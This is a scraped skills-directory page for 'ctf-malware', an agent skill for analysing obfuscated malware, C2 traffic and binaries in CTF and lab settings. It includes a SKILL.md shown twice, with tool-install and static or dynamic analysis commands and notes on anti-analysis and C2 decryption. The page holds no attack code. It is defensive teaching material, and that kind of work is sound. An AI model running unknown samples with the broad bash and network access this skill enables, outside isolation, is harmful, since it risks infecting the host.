Ctf Malware

Name: Ctf Malware
Author: ljagiello

ljagiello/ctf-skills·MIT

Analyze obfuscated malware, C2 traffic, and binaries in CTF-style challenges using YARA, Volatility, and common RE tooling workflows.

Overview

CTF Malware is an agent skill for the Ship phase that provides malware analysis and network-traffic techniques for CTF and lab-style reverse-engineering tasks.

Install

npx skills add https://github.com/ljagiello/ctf-skills --skill ctf-malware

What is this skill?

Covers obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, and RC4/AES encryp
Volatility-oriented memory forensics: malfind, process injection detection
Anti-analysis topics: VM/sandbox detection, timing evasion, API hashing, environment checks
Documented Python and OS package prerequisites plus optional dnSpy for .NET on Windows
Supporting files deep-link techniques; SKILL positions as quick one-liner index into fuller playbooks

Compatible agents: Claude Code, Cursor, any compatible agent

Adoption & trust: 4.2k installs on skills.sh; 2.3k GitHub stars; 1/3 security scanners passed (skills.sh audits).

What problem does it solve?

You are staring at obfuscated malware, encrypted C2, or a suspicious binary in a challenge and need a repeatable analysis path instead of random tool guesses.

Who is it for?

CTF competitors and indie security learners analyzing challenge artifacts in a controlled lab with bash, Python 3, and permission to install analysis tools.

Skip if: Routine production monitoring for a typical indie SaaS, or anyone analyzing live systems without authorization and isolation.

When should I use this skill?

Analyzing obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, RC4/AES encrypted communications, YARA rules, shellcode, memory forensics, or anti-analysis techniques in CTF conte

What do I get? / Deliverables

You follow indexed techniques to deobfuscate, dissect traffic, run memory forensics, and extract configurations and indicators of compromise with the listed toolchains.

Extracted malware configuration and indicators of compromise
Documented analysis steps aligned to challenge artifacts
YARA or traffic dissection notes as required by the task

Recommended Skills

Azure Compliancemicrosoft/azure-skills

Azure Compliance is a Microsoft agent skill for solo builders and small teams who need structured security and complianc…373k installs·1.2k stars

Openclaw Secure Linux Cloudxixu-me/skills

OpenClaw Secure Linux Cloud guides a hardened VPS deployment—rootless Podman, loopback-only gateway, SSH-tunneled Contro…201k installs·61 stars

Entra Agent Idmicrosoft/azure-skills

entra-agent-id is a Microsoft-authored agent skill for provisioning and operating OAuth-capable identities tailored to A…99.1k installs·1.2k stars

Firebase Security Rules Auditorfirebase/agent-skills

Firebase Security Rules Auditor turns your agent into a senior penetration-style reviewer for Firestore rulesets. Solo b…40.3k installs·345 stars

Firestore Security Rules Auditorfirebase/agent-skills

Firestore-security-rules-auditor is a checker skill for solo builders and small teams shipping Firebase-backed apps who …20.3k installs·345 stars

Skill Vetteruseai-pro/openclaw-skills-security

Skill Vetter is a security-first OpenClaw agent skill that makes your coding agent behave like a pre-install auditor for…19.2k installs·62 stars

Journey fit

Primary fit

Malware and traffic analysis is defensive verification work—closest to Ship security practice even when triggered by contest puzzles. Security subphase covers audit-like analysis, IOC extraction, and anti-analysis technique recognition.

How it compares

CTF-oriented malware playbook with install manifests—not a generic OWASP app scanner or dependency-only SCA skill.

Common Questions / FAQ

Who is ctf-malware for?

Players and security-focused builders using filesystem-based agents (Claude Code-style) on malware CTF challenges, forensic puzzles, or authorized lab samples.

When should I use ctf-malware?

During Ship security-style investigations when scripts are obfuscated, traffic looks like C2, binaries need PE/.NET or shellcode analysis, or memory images need Volatility malfind-style checks.

Is ctf-malware safe to install?

The skill enables bash, network, and WebFetch for tool installs—only use in isolated environments; review the Security Audits panel on this Prism page and never run unknown payloads on your main machine.

SKILL.md

READMESKILL.md - Ctf Malware

# CTF Malware & Network Analysis

Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code.

## Prerequisites

**Python packages (all platforms):**
```bash
pip install yara-python pefile capstone oletools unicorn pycryptodome \
  volatility3 dissect.cobaltstrike
```

**Linux (apt):**
```bash
apt install strace ltrace tshark binwalk binutils
```

**macOS (Homebrew):**
```bash
brew install wireshark binwalk binutils ghidra
```

**Manual install:**
- dnSpy — [GitHub](https://github.com/dnSpy/dnSpy), .NET decompiler (Windows)

## Additional Resources

- [scripts-and-obfuscation.md](scripts-and-obfuscation.md) - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis, dynamic analysis techniques (strace/ltrace, network monitoring, memory string extraction, automated sandbox execution), YARA rules for malware detection, shellcode analysis (Unicorn Engine, Capstone), memory forensics for malware (Volatility 3 malfind, process injection detection), anti-analysis techniques (VM detection, timing evasion, API hashing, process injection), trojanized plugin analysis with custom alphabet C2 decoding
- [c2-and-protocols.md](c2-and-protocols.md) - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery, Poison Ivy RAT Camellia decryption
- [pe-and-dotnet.md](pe-and-dotnet.md) - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor

---

## When to Pivot

- If the sample is really just a normal crackme, packed challenge binary, or custom VM with no malware behavior, switch to `/ctf-reverse`.
- If the main job is network reconstruction, disk carving, or host artifact recovery, switch to `/ctf-forensics`.
- If the challenge turns into public attribution or infrastructure tracing, switch to `/ctf-osint`.

## Quick Start Commands

```bash
# Static analysis
file suspicious_file
strings -n 8 suspicious_file | head -50
xxd suspicious_file | head -20

# PE analysis
python3 -c "import pefile; pe=pefile.PE('mal.exe'); print(pe.dump_info())" | head
peframe mal.exe

# Dynamic analysis (sandboxed!)
strace -f -s 200 ./suspicious 2>&1 | head -100
ltrace ./suspicious 2>&1 | head -50

# Network indicators
strings suspicious_file | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
strings suspicious_file | grep -iE 'http|ftp|ws://'

# YARA scan
yara -r rules.yar suspicious_file
```

## Obfuscated Scripts

- Replace `eval`/`bash` with `echo` to print underlying code; extract base64/hex blobs and analyze with `file`. See [scripts-and-obfuscation.md](scripts-and-obfuscation.md).

## JavaScript & PowerShell Deobfuscation

- JS: Replace `eval` with `console.log`, decode `unescape()`, `atob()`, `String.fromCharCode()`.
- PowerShell: Decode `-enc` base64, replace `IEX` with output. See [scripts-and-obfuscation.md](scripts-and-obfuscation.md).

## Junk Code Detection

- NOP sleds, push/pop pairs, dead writ

What is this skill?

Covers obfuscated scripts, malicious packages, custom crypto protocols, C2 traffic, PE/.NET binaries, and RC4/AES encryp

Volatility-oriented memory forensics: malfind, process injection detection

Anti-analysis topics: VM/sandbox detection, timing evasion, API hashing, environment checks

Documented Python and OS package prerequisites plus optional dnSpy for .NET on Windows

Supporting files deep-link techniques; SKILL positions as quick one-liner index into fuller playbooks

Compatible agents: Claude Code, Cursor, any compatible agent

Adoption & trust: 4.2k installs on skills.sh; 2.3k GitHub stars; 1/3 security scanners passed (skills.sh audits).

What do I get? / Deliverables

You follow indexed techniques to deobfuscate, dissect traffic, run memory forensics, and extract configurations and indicators of compromise with the listed toolchains.

Extracted malware configuration and indicators of compromise

Documented analysis steps aligned to challenge artifacts

YARA or traffic dissection notes as required by the task

Journey fit

Primary fit

SKILL.md

READMESKILL.md - Ctf Malware

# CTF Malware & Network Analysis

Quick reference for malware analysis CTF challenges. Each technique has a one-liner here; see supporting files for full details with code.

## Prerequisites

**Python packages (all platforms):**
```bash
pip install yara-python pefile capstone oletools unicorn pycryptodome \
  volatility3 dissect.cobaltstrike
```

**Linux (apt):**
```bash
apt install strace ltrace tshark binwalk binutils
```

**macOS (Homebrew):**
```bash
brew install wireshark binwalk binutils ghidra
```

**Manual install:**
- dnSpy — [GitHub](https://github.com/dnSpy/dnSpy), .NET decompiler (Windows)

## Additional Resources

- [scripts-and-obfuscation.md](scripts-and-obfuscation.md) - JavaScript deobfuscation, PowerShell analysis, eval/base64 decoding, junk code detection, hex payloads, Debian package analysis, dynamic analysis techniques (strace/ltrace, network monitoring, memory string extraction, automated sandbox execution), YARA rules for malware detection, shellcode analysis (Unicorn Engine, Capstone), memory forensics for malware (Volatility 3 malfind, process injection detection), anti-analysis techniques (VM detection, timing evasion, API hashing, process injection), trojanized plugin analysis with custom alphabet C2 decoding
- [c2-and-protocols.md](c2-and-protocols.md) - C2 traffic patterns, custom crypto protocols, RC4 WebSocket, DNS-based C2, network indicators, PCAP analysis, AES-CBC, encryption ID, Telegram bot recovery, Poison Ivy RAT Camellia decryption
- [pe-and-dotnet.md](pe-and-dotnet.md) - PE analysis (peframe, pe-sieve, pestudio), .NET analysis (dnSpy, AsmResolver), LimeRAT extraction, sandbox evasion, malware config extraction, PyInstaller+PyArmor

---

## When to Pivot

- If the sample is really just a normal crackme, packed challenge binary, or custom VM with no malware behavior, switch to `/ctf-reverse`.
- If the main job is network reconstruction, disk carving, or host artifact recovery, switch to `/ctf-forensics`.
- If the challenge turns into public attribution or infrastructure tracing, switch to `/ctf-osint`.

## Quick Start Commands

```bash
# Static analysis
file suspicious_file
strings -n 8 suspicious_file | head -50
xxd suspicious_file | head -20

# PE analysis
python3 -c "import pefile; pe=pefile.PE('mal.exe'); print(pe.dump_info())" | head
peframe mal.exe

# Dynamic analysis (sandboxed!)
strace -f -s 200 ./suspicious 2>&1 | head -100
ltrace ./suspicious 2>&1 | head -50

# Network indicators
strings suspicious_file | grep -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
strings suspicious_file | grep -iE 'http|ftp|ws://'

# YARA scan
yara -r rules.yar suspicious_file
```

## Obfuscated Scripts

- Replace `eval`/`bash` with `echo` to print underlying code; extract base64/hex blobs and analyze with `file`. See [scripts-and-obfuscation.md](scripts-and-obfuscation.md).

## JavaScript & PowerShell Deobfuscation

- JS: Replace `eval` with `console.log`, decode `unescape()`, `atob()`, `String.fromCharCode()`.
- PowerShell: Decode `-enc` base64, replace `IEX` with output. See [scripts-and-obfuscation.md](scripts-and-obfuscation.md).

## Junk Code Detection

- NOP sleds, push/pop pairs, dead writ

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is ctf-malware for?

When should I use ctf-malware?

Is ctf-malware safe to install?

SKILL.md

This week for builders

Overview

Install

What is this skill?

What problem does it solve?

Who is it for?

When should I use this skill?

What do I get? / Deliverables

Recommended Skills

Journey fit

Who is ctf-malware for?

When should I use ctf-malware?

Is ctf-malware safe to install?

SKILL.md